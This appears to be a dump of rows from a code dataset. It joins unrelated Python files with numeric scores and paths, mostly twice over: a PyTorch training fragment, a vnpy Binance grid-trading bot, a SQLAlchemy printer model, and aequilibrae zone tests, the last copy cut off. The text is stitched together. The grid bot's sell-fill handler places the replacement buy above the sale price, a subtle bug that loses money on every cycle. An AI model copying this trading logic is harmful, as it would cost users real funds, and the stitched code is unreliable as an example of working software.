inds = {k: v for k, v in inds.items() if k >= min(self.scales)}
for scale, (start_idx, stop_idx) in inds.items():
acc1, acc5 = utils.accuracy(
outputs['abstr'][..., start_idx:stop_idx],
targets['abstr'][..., start_idx:stop_idx],
topk=(1, 5),
)
self.meters[f'top1@abstr_{scale}'].update(acc1.item(), self.batch_size)
self.meters[f'top5@abstr_{scale}'].update(acc5.item(), self.batch_size)
if mode == 'train':
# Compute gradient and do SGD step
self.optimizer.zero_grad()
loss['full'].backward()
# Clip gradients
if self.params['clip_gradient'] is not None:
clip_gradient = self.params['clip_gradient']
total_norm = clip_grad_norm_(self.model.parameters(), clip_gradient)
if total_norm > clip_gradient:
print(
f'clipping gradient: {total_norm:.4f} with coef {(clip_gradient/total_norm):.4f}'
)
# Update weights
self.optimizer.step()
elif mode == 'eval':
for name in self.names['outputs']:
probs, preds = F.softmax(outputs[name], 1).sort(1, True)
self.probs[name].append(probs.detach().cpu())
self.preds[name].append(preds.detach().cpu())
self.targets[name].append(targets[name].detach().cpu())
self.outputs[name].append(outputs[name].detach().cpu())
def target_transform(self, target, mode='train'):
targets = {}
min_scale = min(self.scales)
offset = {1: 0, 2: 4, 3: 10, 4: 15}.get(min_scale)
for name, tgt in zip(self.names['targets'], target):
targets[name] = tgt.cuda(non_blocking=True)[:, offset:]
self.batch_size = tgt.size(0)
return targets
def input_transform(self, input, mode='train'):
return input
def output_transform(self, output, mode='train'):
return output
@cache
def name(self):
name = '_'.join(
map(
str,
[
self.__class__.__name__,
self.exp_id,
self.params['dataset_name'],
self.params['basemodel_name'],
'-'.join(map(str, self.param_names['loss_weights'])),
'-'.join(map(str, self.param_names['criterion'])),
'-'.join(map(str, [self.param_names['optimizer'], self.lr])),
self._model.name,
],
)
)
name = self.params['resume'] or name
name = re.sub(r'_(checkpoint|best).pth.tar$', '', name)
name = self.params['prefix'] + name.split('/')[-1]
name = type(self).__name__ + '_' + '_'.join(name.split('_')[1:])
return name
def check_rootfolders(self):
"""Create log and model folder."""
folders_util = [
self.params['log_dir'],
self.params['output_dir'],
self.params['metadata_dir'],
self.params['checkpoint_dir'],
]
for folder in folders_util:
os.makedirs(folder, exist_ok=True)
def save_name(self, save_type='EVAL', mode='val', format='torch'):
ext = {'torch': '.pth', 'pickle': '.pkl', 'npz': '.npz'}.get(format, '')
name = '_'.join(
map(
str,
[
save_type.upper(),
mode.upper(),
'-'.join(self.attrs),
'-'.join(map(str, self.set_maxmin)),
self.name,
],
)
)
return self.params['prefix'] + name + ext
def save_checkpoint(self, state, is_best, filename='checkpoint.pth.tar', freq=5):
checkpoint_dir = os.path.join(
self.params['checkpoint_dir'],
self.__class__.__name__,
'_'.join([type(self._model).__name__]),
)
# type(self._model.model).__name__]))
os.makedirs(checkpoint_dir, exist_ok=True)
checkpoint_file = os.path.join(
checkpoint_dir, f'{self.name}_checkpoint.pth.tar'
)
best_file = checkpoint_file.replace('checkpoint.pth.tar', 'best.pth.tar')
epoch_file = checkpoint_file.replace(
'checkpoint.pth.tar', f'epoch_{state["epoch"]}.pth.tar'
)
# torch.save(state, checkpoint_file, pickle_protocol=4)
torch.save(state, checkpoint_file)
if is_best:
shutil.copyfile(checkpoint_file, best_file)
elif state['epoch'] % freq == 0:
shutil.copyfile(checkpoint_file, epoch_file)
def load_checkpont(self):
if self.params['resume'] is None:
self.params['checkpoint'] = None
return
file = self.params['resume']
if os.path.exists(file):
print(("=> loading checkpoint '{}'".format(file)))
checkpoint = torch.load(file)
self.params['start_epoch'] = checkpoint['epoch']
self.best_acc1 = checkpoint['best_acc1']
self.model.load_state_dict(checkpoint['state_dict'])
try:
self.optimizer.load_state_dict(checkpoint['optimizer'])
except (KeyError, AttributeError):
pass
else:
print(
(
"=> loaded checkpoint '{}' (epoch {})".format(
file, checkpoint['epoch']
)
)
)
print(f'Best Acc@1: {self.best_acc1:.3f}')
torch.cuda.empty_cache()
else:
print(("=> no checkpoint found at '{}'".format(file)))
@cache
def save_prefix(self):
return os.path.join(
self.__class__.__name__,
'_'.join([type(self._model).__name__, type(self._model.model).__name__]),
) | 0.792986 | 0.160167 |
import decimal
from threading import Thread
from vnpy.trader.constant import Status, Direction
from vnpy.trader.object import AccountData
from vnpy_ctastrategy import (
CtaTemplate,
StopOrder,
TickData,
BarData,
TradeData,
OrderData
)
from time import time
import numpy as np
import time
import decimal
from decimal import Decimal
class BinanceSpotGridStrategy(CtaTemplate):
""""""
author = "用Python的交易员"
base = 'DOGE'
quote = 'USDT'
bottom = 0.24
top = 0.27
step = 0.006
quote_size = 11
precision = 0.0001
min_trade_amount = 1
initial_orders_sent = False
initial_orders_submitted = False
parameters = ['base', 'quote', 'bottom', 'top', 'step', 'quote_size',
'precision', 'min_trade_amount']
variables = ['initial_orders_sent', 'initial_orders_submitted']
def __init__(self, cta_engine, strategy_name, vt_symbol, setting):
""""""
super().__init__(cta_engine, strategy_name, vt_symbol, setting)
self.initial_order_ids = []
self.last_tick = None
def check_balance(self, base_needed, quote_needed):
main_engine = self.cta_engine.main_engine
base_account_id = 'BINANCE_SPOT.' + self.base
quote_account_id = 'BINANCE_SPOT.' + self.quote
base: AccountData = main_engine.get_account(base_account_id)
quote: AccountData = main_engine.get_account(quote_account_id)
available_base = base.balance - base.frozen
available_quote = quote.balance - quote.frozen
if available_base < base_needed:
raise ValueError(
f'available base: {available_base}, base needed: {base_needed}')
if available_quote < quote_needed:
raise ValueError(
f'available quote: {available_quote}, quote needed: {quote_needed}')
def round_price(self, price: float) -> float:
price = Decimal(str(price)).quantize(Decimal(str(self.precision)))
return float(price)
def get_volume(self, price: float) -> float:
volume = Decimal(str(self.quote_size / price)).quantize(
Decimal(str(self.min_trade_amount)), decimal.ROUND_UP)
return float(volume)
def new_order(self, price, direction):
volume = self.get_volume(price)
if direction == Direction.LONG:
order_ids = self.buy(price, volume)
elif direction == Direction.SHORT:
order_ids = self.sell(price, volume)
else:
order_ids = []
if not order_ids:
raise Exception(
f'下单失败: price: {price}, volume: {volume} direction: {direction}')
self.initial_order_ids += order_ids
def init_orders(self, start_price):
self.write_log('开始初始化网格订单')
buys = []
sells = []
price = start_price
while price > self.bottom:
price *= (1 - self.step)
buys.append(self.round_price(price))
price = start_price
while price < self.top:
price *= (1 + self.step)
sells.append(self.round_price(price))
quote_needed = self.quote_size * len(buys)
base_needed = (self.quote_size / np.array(sells)).sum()
self.check_balance(base_needed, quote_needed)
self.new_order(buys[0], Direction.LONG)
self.new_order(buys[1], Direction.LONG)
self.new_order(sells[0], Direction.SHORT)
self.new_order(sells[1], Direction.SHORT)
for price in buys[2:]:
self.new_order(price, Direction.LONG)
time.sleep(0.5)
for price in sells[2:]:
self.new_order(price, Direction.SHORT)
time.sleep(0.5)
self.initial_orders_sent = True
self.write_log('网格订单初始化完毕')
def on_init(self):
"""
Callback when strategy is inited.
"""
self.write_log('初始化策略')
pass
def on_start(self):
"""
Callback when strategy is started.
"""
self.trading = True
self.write_log('开始策略')
i = 0
while self.last_tick is None:
time.sleep(1)
i += 1
if i > 30:
raise TimeoutError('超时未获取到最新价格')
start_price = self.last_tick
self.write_log(f'以{start_price}为开始价格, 启动初始化线程')
t = Thread(target=self.init_orders, args=(start_price,))
t.start()
def on_stop(self):
"""
Callback when strategy is stopped.
"""
pass
def on_tick(self, tick: TickData):
"""
Callback of new tick data update.
"""
self.last_tick = tick.last_price
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
pass
def on_order(self, order: OrderData):
"""
Callback of new order data update.
"""
if order.status == Status.ALLTRADED:
if order.direction == Direction.LONG:
self.write_log(
f'买单成交 - price: {order.price}, volume: {order.volume}')
price = self.round_price(order.price * (1 + self.step))
volume = self.get_volume(price)
self.write_log(f'卖单下单 - price: {price}, volume: {volume}')
self.sell(price, volume)
elif order.direction == Direction.SHORT:
self.write_log(
f'卖单成交 - price: {order.price}, volume: {order.volume}')
price = self.round_price(order.price * (1 + self.step))
volume = self.get_volume(price)
self.write_log(f'买单下单 - price: {price}, volume: {volume}')
self.buy(price, volume)
elif order.status == Status.NOTTRADED:
if not self.initial_orders_submitted:
order_id = 'BINANCE_SPOT.' + order.orderid
if order_id not in self.initial_order_ids:
self.write_log('Warning: 网格订单未初始化前产生了其他订单')
self.initial_order_ids.remove(order_id)
if not self.initial_order_ids and self.initial_orders_sent:
self.initial_orders_submitted = True
self.write_log('网格初始订单全部挂单成功')
self.write_log(
f'下单成功 - price: {order.price}, volume: {order.volume},'
f'direction: {order.direction}')
elif order.status == Status.REJECTED:
self.write_log(f'下单失败 - id: {order.orderid}')
elif order.status == Status.CANCELLED:
self.write_log(f'订单撤销 - id: {order.orderid}')
def on_trade(self, trade: TradeData):
"""
Callback of new trade data update.
"""
pass
def on_stop_order(self, stop_order: StopOrder):
"""
Callback of stop order update.
"""
pass | working_dir/strategies/binance_spot_grid_strategy.py | import decimal
from threading import Thread
from vnpy.trader.constant import Status, Direction
from vnpy.trader.object import AccountData
from vnpy_ctastrategy import (
CtaTemplate,
StopOrder,
TickData,
BarData,
TradeData,
OrderData
)
from time import time
import numpy as np
import time
import decimal
from decimal import Decimal
class BinanceSpotGridStrategy(CtaTemplate):
""""""
author = "用Python的交易员"
base = 'DOGE'
quote = 'USDT'
bottom = 0.24
top = 0.27
step = 0.006
quote_size = 11
precision = 0.0001
min_trade_amount = 1
initial_orders_sent = False
initial_orders_submitted = False
parameters = ['base', 'quote', 'bottom', 'top', 'step', 'quote_size',
'precision', 'min_trade_amount']
variables = ['initial_orders_sent', 'initial_orders_submitted']
def __init__(self, cta_engine, strategy_name, vt_symbol, setting):
""""""
super().__init__(cta_engine, strategy_name, vt_symbol, setting)
self.initial_order_ids = []
self.last_tick = None
def check_balance(self, base_needed, quote_needed):
main_engine = self.cta_engine.main_engine
base_account_id = 'BINANCE_SPOT.' + self.base
quote_account_id = 'BINANCE_SPOT.' + self.quote
base: AccountData = main_engine.get_account(base_account_id)
quote: AccountData = main_engine.get_account(quote_account_id)
available_base = base.balance - base.frozen
available_quote = quote.balance - quote.frozen
if available_base < base_needed:
raise ValueError(
f'available base: {available_base}, base needed: {base_needed}')
if available_quote < quote_needed:
raise ValueError(
f'available quote: {available_quote}, quote needed: {quote_needed}')
def round_price(self, price: float) -> float:
price = Decimal(str(price)).quantize(Decimal(str(self.precision)))
return float(price)
def get_volume(self, price: float) -> float:
volume = Decimal(str(self.quote_size / price)).quantize(
Decimal(str(self.min_trade_amount)), decimal.ROUND_UP)
return float(volume)
def new_order(self, price, direction):
volume = self.get_volume(price)
if direction == Direction.LONG:
order_ids = self.buy(price, volume)
elif direction == Direction.SHORT:
order_ids = self.sell(price, volume)
else:
order_ids = []
if not order_ids:
raise Exception(
f'下单失败: price: {price}, volume: {volume} direction: {direction}')
self.initial_order_ids += order_ids
def init_orders(self, start_price):
self.write_log('开始初始化网格订单')
buys = []
sells = []
price = start_price
while price > self.bottom:
price *= (1 - self.step)
buys.append(self.round_price(price))
price = start_price
while price < self.top:
price *= (1 + self.step)
sells.append(self.round_price(price))
quote_needed = self.quote_size * len(buys)
base_needed = (self.quote_size / np.array(sells)).sum()
self.check_balance(base_needed, quote_needed)
self.new_order(buys[0], Direction.LONG)
self.new_order(buys[1], Direction.LONG)
self.new_order(sells[0], Direction.SHORT)
self.new_order(sells[1], Direction.SHORT)
for price in buys[2:]:
self.new_order(price, Direction.LONG)
time.sleep(0.5)
for price in sells[2:]:
self.new_order(price, Direction.SHORT)
time.sleep(0.5)
self.initial_orders_sent = True
self.write_log('网格订单初始化完毕')
def on_init(self):
"""
Callback when strategy is inited.
"""
self.write_log('初始化策略')
pass
def on_start(self):
"""
Callback when strategy is started.
"""
self.trading = True
self.write_log('开始策略')
i = 0
while self.last_tick is None:
time.sleep(1)
i += 1
if i > 30:
raise TimeoutError('超时未获取到最新价格')
start_price = self.last_tick
self.write_log(f'以{start_price}为开始价格, 启动初始化线程')
t = Thread(target=self.init_orders, args=(start_price,))
t.start()
def on_stop(self):
"""
Callback when strategy is stopped.
"""
pass
def on_tick(self, tick: TickData):
"""
Callback of new tick data update.
"""
self.last_tick = tick.last_price
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
pass
def on_order(self, order: OrderData):
"""
Callback of new order data update.
"""
if order.status == Status.ALLTRADED:
if order.direction == Direction.LONG:
self.write_log(
f'买单成交 - price: {order.price}, volume: {order.volume}')
price = self.round_price(order.price * (1 + self.step))
volume = self.get_volume(price)
self.write_log(f'卖单下单 - price: {price}, volume: {volume}')
self.sell(price, volume)
elif order.direction == Direction.SHORT:
self.write_log(
f'卖单成交 - price: {order.price}, volume: {order.volume}')
price = self.round_price(order.price * (1 + self.step))
volume = self.get_volume(price)
self.write_log(f'买单下单 - price: {price}, volume: {volume}')
self.buy(price, volume)
elif order.status == Status.NOTTRADED:
if not self.initial_orders_submitted:
order_id = 'BINANCE_SPOT.' + order.orderid
if order_id not in self.initial_order_ids:
self.write_log('Warning: 网格订单未初始化前产生了其他订单')
self.initial_order_ids.remove(order_id)
if not self.initial_order_ids and self.initial_orders_sent:
self.initial_orders_submitted = True
self.write_log('网格初始订单全部挂单成功')
self.write_log(
f'下单成功 - price: {order.price}, volume: {order.volume},'
f'direction: {order.direction}')
elif order.status == Status.REJECTED:
self.write_log(f'下单失败 - id: {order.orderid}')
elif order.status == Status.CANCELLED:
self.write_log(f'订单撤销 - id: {order.orderid}')
def on_trade(self, trade: TradeData):
"""
Callback of new trade data update.
"""
pass
def on_stop_order(self, stop_order: StopOrder):
"""
Callback of stop order update.
"""
pass | 0.488039 | 0.286356 |
from despinassy.db import db
from despinassy.ipc import IpcOrigin, IpcMessageType
from despinassy.Channel import Channel
from sqlalchemy.orm import relationship, validates
from sqlalchemy.exc import IntegrityError
from enum import IntEnum
import datetime
import json
class PrinterDialectEnum(IntEnum):
"""
List the currently supported printer dialect for printer device to output.
"""
UNDEFINED = 0
"""Not defined dialect"""
ZEBRA_ZPL = 1
"""The Zebra ZPL printing language"""
TEST_JSON = 2
"""Output as JSON object"""
@staticmethod
def from_extension(extension: str):
"""Return dialect from file extension.
:param extension: String representing the extension of the dialect.
"""
if extension == "zpl":
return PrinterDialectEnum.ZEBRA_ZPL
elif extension == "json":
return PrinterDialectEnum.TEST_JSON
else:
return PrinterDialectEnum.UNDEFINED
class PrinterTypeEnum(IntEnum):
"""
List the currently supported type of printer device.
"""
UNDEFINED = 0
"""Not defined printer"""
STDOUT = 1
"""Print to the terminal"""
TEST = 2
"""Printer type used only on test case"""
STATIC = 3
"""Network printer with a static IP address"""
class Printer(db.Model):
"""
The `Printer` model code.
Printers entry are devices that can output parts in a defined dialect.
This model holds the information about this output device.
A `Printer` can either be something virtual that will just output the
result to a console or a physical device like a Zebra sticker printer.
"""
__tablename__ = "printer"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
type = db.Column(db.Enum(PrinterTypeEnum), nullable=False)
"""
Type of printer device. See :class:`despinassy.Printer.PrinterTypeEnum` for
more information.
"""
available = db.Column(db.Boolean)
"""
Whether or not the `Printer` is currently available to print something.
For instance if a printer of type `PrinterTypeEnum.STATIC` is not connected
this boolean will be listed as false.
"""
width = db.Column(db.Integer)
"""Width of the output"""
height = db.Column(db.Integer)
"""Height of the output"""
dialect = db.Column(db.Enum(PrinterDialectEnum), nullable=False)
"""
Print form of the output of the printer.
See :class:`despinassy.Printer.PrinterDialectEnum` for more information.
"""
name = db.Column(db.String(50), nullable=False)
"""User defined common name for this printer"""
redis_id = db.Column(db.Integer, db.ForeignKey("channel.id"))
redis = relationship("Channel")
"""Channel the printer listen for incoming message"""
settings = db.Column(db.JSON)
"""Settings dependant on printer type"""
transactions = relationship(
"PrinterTransaction",
order_by="desc(PrinterTransaction.created_at)",
back_populates="printer",
)
"""List of transaction sent to this printer"""
hidden = db.Column(db.Boolean, default=False)
"""Is the printer hidden to the user."""
created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
updated_at = db.Column(db.DateTime, onupdate=datetime.datetime.utcnow)
@validates("redis")
def validate_redis(self, key, value):
c = Channel.query.filter(Channel.name == value)
if c.count():
c = c.first()
else:
try:
c = Channel(name=value)
db.session.add(c)
db.session.commit()
except IntegrityError:
db.session.rollback()
c = Channel.query.filter(Channel.name == value).first()
return c
def to_dict(self, full=False):
if full:
return {
"id": self.id,
"type": self.type,
"available": self.available,
"width": self.width,
"height": self.height,
"dialect": self.dialect,
"name": self.name,
"redis": str(self.redis),
"settings": json.loads(self.settings),
"transactions": [t.to_dict() for t in self.transactions],
"created_at": self.created_at,
"updated_at": self.updated_at,
"hidden": self.hidden,
}
else:
return {
"id": self.id,
"type": self.type,
"available": self.available,
"width": self.width,
"height": self.height,
"dialect": self.dialect,
"name": self.name,
"redis": str(self.redis),
"settings": json.loads(self.settings),
"created_at": self.created_at,
"updated_at": self.updated_at,
"hidden": self.hidden,
}
def add_transaction(self, **kwargs):
"""Helper to create a new :class:`despinassy.Printer.PrinterTransaction`
Someone should always use this helper function to create a new
:class:`despinassy.Printer.PrinterTransaction` instead of creating
one by hand.
"""
self.updated_at = datetime.datetime.utcnow()
pt = PrinterTransaction(printer=self, **kwargs)
return pt
def __repr__(self):
return "<Printer id=%i type=%i name='%s' redis='%s' settings='%s'>" % (
self.id,
self.type,
self.name,
str(self.redis),
self.settings,
)
class PrinterTransaction(db.Model):
"""
The `PrinterTransaction` model code representing the messages sent
to a :class:`despinassy.Printer.Printer`.
The transaction of a printer can either be control messages or print query
to output content like parts from the printer.
"""
__tablename__ = "printer_transaction"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
printer_id = db.Column(db.Integer, db.ForeignKey("printer.id"))
printer = relationship("Printer")
""":class:`despinassy.Printer.Printer` where the transaction happened"""
# part_id = db.Column(db.Integer, db.ForeignKey('part.id'), unique=True)
# part = relationship('Part')
destination = db.Column(db.String(50))
origin = db.Column(db.Enum(IpcOrigin), nullable=False)
"""
Device that created this transaction.
See :class:`despinassy.ipc.IpcOrigin` for more information.
"""
device = db.Column(db.String(50))
"""
String precising the origin of the originator of the transaction.
"""
msg_type = db.Column(db.Integer, default=IpcMessageType.PRINT)
"""
Type of the message received by the printer.
See :class:`despinassy.ipc.IpcOrigin` for more information.
"""
barcode = db.Column(db.String(50), nullable=False)
"""Barcode of the part the message refer to"""
name = db.Column(db.String(120), nullable=False)
"""Name of the part the message refer to"""
number = db.Column(db.Integer, default=1)
"""Number of output required by the printer"""
created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
def to_dict(self):
return {
"id": self.id,
"barcode": self.barcode,
"name": self.name,
"number": self.number,
"origin": self.origin,
"device": self.device,
"created_at": self.created_at,
} | despinassy/Printer.py | from despinassy.db import db
from despinassy.ipc import IpcOrigin, IpcMessageType
from despinassy.Channel import Channel
from sqlalchemy.orm import relationship, validates
from sqlalchemy.exc import IntegrityError
from enum import IntEnum
import datetime
import json
class PrinterDialectEnum(IntEnum):
"""
List the currently supported printer dialect for printer device to output.
"""
UNDEFINED = 0
"""Not defined dialect"""
ZEBRA_ZPL = 1
"""The Zebra ZPL printing language"""
TEST_JSON = 2
"""Output as JSON object"""
@staticmethod
def from_extension(extension: str):
"""Return dialect from file extension.
:param extension: String representing the extension of the dialect.
"""
if extension == "zpl":
return PrinterDialectEnum.ZEBRA_ZPL
elif extension == "json":
return PrinterDialectEnum.TEST_JSON
else:
return PrinterDialectEnum.UNDEFINED
class PrinterTypeEnum(IntEnum):
"""
List the currently supported type of printer device.
"""
UNDEFINED = 0
"""Not defined printer"""
STDOUT = 1
"""Print to the terminal"""
TEST = 2
"""Printer type used only on test case"""
STATIC = 3
"""Network printer with a static IP address"""
class Printer(db.Model):
"""
The `Printer` model code.
Printers entry are devices that can output parts in a defined dialect.
This model holds the information about this output device.
A `Printer` can either be something virtual that will just output the
result to a console or a physical device like a Zebra sticker printer.
"""
__tablename__ = "printer"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
type = db.Column(db.Enum(PrinterTypeEnum), nullable=False)
"""
Type of printer device. See :class:`despinassy.Printer.PrinterTypeEnum` for
more information.
"""
available = db.Column(db.Boolean)
"""
Whether or not the `Printer` is currently available to print something.
For instance if a printer of type `PrinterTypeEnum.STATIC` is not connected
this boolean will be listed as false.
"""
width = db.Column(db.Integer)
"""Width of the output"""
height = db.Column(db.Integer)
"""Height of the output"""
dialect = db.Column(db.Enum(PrinterDialectEnum), nullable=False)
"""
Print form of the output of the printer.
See :class:`despinassy.Printer.PrinterDialectEnum` for more information.
"""
name = db.Column(db.String(50), nullable=False)
"""User defined common name for this printer"""
redis_id = db.Column(db.Integer, db.ForeignKey("channel.id"))
redis = relationship("Channel")
"""Channel the printer listen for incoming message"""
settings = db.Column(db.JSON)
"""Settings dependant on printer type"""
transactions = relationship(
"PrinterTransaction",
order_by="desc(PrinterTransaction.created_at)",
back_populates="printer",
)
"""List of transaction sent to this printer"""
hidden = db.Column(db.Boolean, default=False)
"""Is the printer hidden to the user."""
created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
updated_at = db.Column(db.DateTime, onupdate=datetime.datetime.utcnow)
@validates("redis")
def validate_redis(self, key, value):
c = Channel.query.filter(Channel.name == value)
if c.count():
c = c.first()
else:
try:
c = Channel(name=value)
db.session.add(c)
db.session.commit()
except IntegrityError:
db.session.rollback()
c = Channel.query.filter(Channel.name == value).first()
return c
def to_dict(self, full=False):
if full:
return {
"id": self.id,
"type": self.type,
"available": self.available,
"width": self.width,
"height": self.height,
"dialect": self.dialect,
"name": self.name,
"redis": str(self.redis),
"settings": json.loads(self.settings),
"transactions": [t.to_dict() for t in self.transactions],
"created_at": self.created_at,
"updated_at": self.updated_at,
"hidden": self.hidden,
}
else:
return {
"id": self.id,
"type": self.type,
"available": self.available,
"width": self.width,
"height": self.height,
"dialect": self.dialect,
"name": self.name,
"redis": str(self.redis),
"settings": json.loads(self.settings),
"created_at": self.created_at,
"updated_at": self.updated_at,
"hidden": self.hidden,
}
def add_transaction(self, **kwargs):
"""Helper to create a new :class:`despinassy.Printer.PrinterTransaction`
Someone should always use this helper function to create a new
:class:`despinassy.Printer.PrinterTransaction` instead of creating
one by hand.
"""
self.updated_at = datetime.datetime.utcnow()
pt = PrinterTransaction(printer=self, **kwargs)
return pt
def __repr__(self):
return "<Printer id=%i type=%i name='%s' redis='%s' settings='%s'>" % (
self.id,
self.type,
self.name,
str(self.redis),
self.settings,
)
class PrinterTransaction(db.Model):
"""
The `PrinterTransaction` model code representing the messages sent
to a :class:`despinassy.Printer.Printer`.
The transaction of a printer can either be control messages or print query
to output content like parts from the printer.
"""
__tablename__ = "printer_transaction"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
printer_id = db.Column(db.Integer, db.ForeignKey("printer.id"))
printer = relationship("Printer")
""":class:`despinassy.Printer.Printer` where the transaction happened"""
# part_id = db.Column(db.Integer, db.ForeignKey('part.id'), unique=True)
# part = relationship('Part')
destination = db.Column(db.String(50))
origin = db.Column(db.Enum(IpcOrigin), nullable=False)
"""
Device that created this transaction.
See :class:`despinassy.ipc.IpcOrigin` for more information.
"""
device = db.Column(db.String(50))
"""
String precising the origin of the originator of the transaction.
"""
msg_type = db.Column(db.Integer, default=IpcMessageType.PRINT)
"""
Type of the message received by the printer.
See :class:`despinassy.ipc.IpcOrigin` for more information.
"""
barcode = db.Column(db.String(50), nullable=False)
"""Barcode of the part the message refer to"""
name = db.Column(db.String(120), nullable=False)
"""Name of the part the message refer to"""
number = db.Column(db.Integer, default=1)
"""Number of output required by the printer"""
created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
def to_dict(self):
return {
"id": self.id,
"barcode": self.barcode,
"name": self.name,
"number": self.number,
"origin": self.origin,
"device": self.device,
"created_at": self.created_at,
} | 0.771757 | 0.352425 |
from warnings import warn
from math import sqrt
from uuid import uuid4
from random import randint
from shutil import copytree, rmtree
from os.path import join
from tempfile import gettempdir
from unittest import TestCase
from shapely.geometry import Point, MultiPolygon
import shapely.wkb
from aequilibrae import Project
from ...data import siouxfalls_project
from aequilibrae.utils.create_example import create_example
class TestZone(TestCase):
def setUp(self) -> None:
self.temp_proj_folder = join(gettempdir(), uuid4().hex)
copytree(siouxfalls_project, self.temp_proj_folder)
self.proj = Project()
self.proj.open(self.temp_proj_folder)
def tearDown(self) -> None:
self.proj.close()
try:
rmtree(self.temp_proj_folder)
except Exception as e:
warn(f'Error: {e.args}')
def test_delete(self):
zones = self.proj.zoning
zone_downtown = zones.get(3)
zone_downtown.delete()
with self.assertRaises(ValueError):
_ = zones.get(3)
def test_save(self):
zones = self.proj.zoning
zn = zones.get(2)
area = randint(0, 9999999999)
zn.area = area
zn.save()
curr = self.proj.conn.cursor()
curr.execute('Select area from Zones where zone_id=2')
self.assertEqual(curr.fetchone()[0], area, "Zone didn't save area properly")
geo = Point(0, 0).buffer(1)
zn.geometry = geo
zn.save()
curr = self.proj.conn.cursor()
curr.execute('Select asBinary(geometry) from Zones where zone_id=2')
wkb = curr.fetchone()[0]
self.assertEqual(shapely.wkb.loads(wkb), MultiPolygon([geo]), "Zone didn't save geometry properly")
zn2 = zones.get(1)
geo = MultiPolygon([Point(0, 0).buffer(1)])
zn2.geometry = geo
zn2.save()
curr = self.proj.conn.cursor()
curr.execute('Select asBinary(geometry) from Zones where zone_id=1')
wkb = curr.fetchone()[0]
self.assertEqual(shapely.wkb.loads(wkb), geo, "Zone didn't save geometry properly")
def __change_project(self):
self.proj.close()
self.proj = Project()
self.proj = create_example(join(gettempdir(), uuid4().hex), 'nauru')
zones = 5
network = self.proj.network
nodes = network.nodes
geo = network.convex_hull()
zone_area = geo.area / zones
zone_side = sqrt(2 * sqrt(3) * zone_area / 9)
extent = network.extent()
curr = self.proj.conn.cursor()
b = extent.bounds
curr.execute('select st_asbinary(HexagonalGrid(GeomFromWKB(?), ?, 0, GeomFromWKB(?)))',
[extent.wkb, zone_side, Point(b[2], b[3]).wkb])
grid = curr.fetchone()[0]
grid = shapely.wkb.loads(grid)
grid = [p for p in grid if p.intersects(geo)]
zoning = self.proj.zoning
for i, zone_geo in enumerate(grid):
zone = zoning.new(i + 1)
zone.geometry = zone_geo
zone.save()
node = nodes.get(i + 1)
node.renumber(i + 10001)
def test_add_centroid(self):
self.__change_project()
zones = self.proj.zoning
nodes = self.proj.network.nodes
network = self.proj.network
zone1 = zones.get(1)
tot = network.count_centroids()
zone1.add_centroid(None)
self.assertEqual(tot + 1, network.count_centroids(), "Added less than it should've")
tot = network.count_centroids()
zone1.add_centroid(None)
zone1.add_centroid(Point(0, 0))
self.assertEqual(tot, network.count_centroids(), "Added more than should've")
node1 = nodes.get(1)
self.assertEqual(node1.geometry, zone1.geometry.centroid)
zone2 = zones.get(2)
zone2.add_centroid(Point(0, 0))
node2 = nodes.get(2)
self.assertEqual(node2.geometry, Point(0, 0))
def test_connect_mode(self):
self.__change_project()
curr = self.proj.conn.cursor()
zones = self.proj.zoning
zone1 = zones.get(1)
zone1.add_centroid(None)
zone1.connect_mode('c')
curr.execute('Select count(*) from links where a_node=?', [1])
self.assertIsNot(0, curr.fetchone()[0], 'failed to add connectors')
zone1.connect_mode('t')
curr.execute('''Select count(*) from links where a_node=? and instr(modes,'t')>0''', [1])
self.assertIsNot(0, curr.fetchone()[0], 'failed to add connectors for mode t')
# Cannot connect a centroid that does not exist
with self.assertRaises(ValueError):
zone2 = zones.get(2)
zone2.connect_mode('c')
def test_disconnect_mode(self):
self.__change_project()
curr = self.proj.conn.cursor()
zones = self.proj.zoning
zone1 = zones.get(1)
zone1.add_centroid(None)
zone1.connect_mode('c')
zone1.connect_mode('w')
curr.execute('''select COUNT(*) from links where a_node=1''')
tot = curr.fetchone()[0]
curr.execute('''Update links set modes = modes || 'w' where instr(modes,'w')=0''')
self.proj.conn.commit()
zone1.disconnect_mode('w')
curr.execute('''select COUNT(*) from links where a_node=1''')
self.assertIsNot(tot, curr.fetchone()[0], 'failed to delete links')
curr.execute('''Select count(*) from links where a_node=1 and instr(modes,'w')>0''')
self.assertEqual(curr.fetchone()[0], 0, 'Failed to remove mode from all connectors') | tests/aequilibrae/project/test_zone.py | from warnings import warn
from math import sqrt
from uuid import uuid4
from random import randint
from shutil import copytree, rmtree
from os.path import join
from tempfile import gettempdir
from unittest import TestCase
from shapely.geometry import Point, MultiPolygon
import shapely.wkb
from aequilibrae import Project
from ...data import siouxfalls_project
from aequilibrae.utils.create_example import create_example
class TestZone(TestCase):
def setUp(self) -> None:
self.temp_proj_folder = join(gettempdir(), uuid4().hex)
copytree(siouxfalls_project, self.temp_proj_folder)
self.proj = Project()
self.proj.open(self.temp_proj_folder)
def tearDown(self) -> None:
self.proj.close()
try:
rmtree(self.temp_proj_folder)
except Exception as e:
warn(f'Error: {e.args}')
def test_delete(self):
zones = self.proj.zoning
zone_downtown = zones.get(3)
zone_downtown.delete()
with self.assertRaises(ValueError):
_ = zones.get(3)
def test_save(self):
zones = self.proj.zoning
zn = zones.get(2)
area = randint(0, 9999999999)
zn.area = area
zn.save()
curr = self.proj.conn.cursor()
curr.execute('Select area from Zones where zone_id=2')
self.assertEqual(curr.fetchone()[0], area, "Zone didn't save area properly")
geo = Point(0, 0).buffer(1)
zn.geometry = geo
zn.save()
curr = self.proj.conn.cursor()
curr.execute('Select asBinary(geometry) from Zones where zone_id=2')
wkb = curr.fetchone()[0]
self.assertEqual(shapely.wkb.loads(wkb), MultiPolygon([geo]), "Zone didn't save geometry properly")
zn2 = zones.get(1)
geo = MultiPolygon([Point(0, 0).buffer(1)])
zn2.geometry = geo
zn2.save()
curr = self.proj.conn.cursor()
curr.execute('Select asBinary(geometry) from Zones where zone_id=1')
wkb = curr.fetchone()[0]
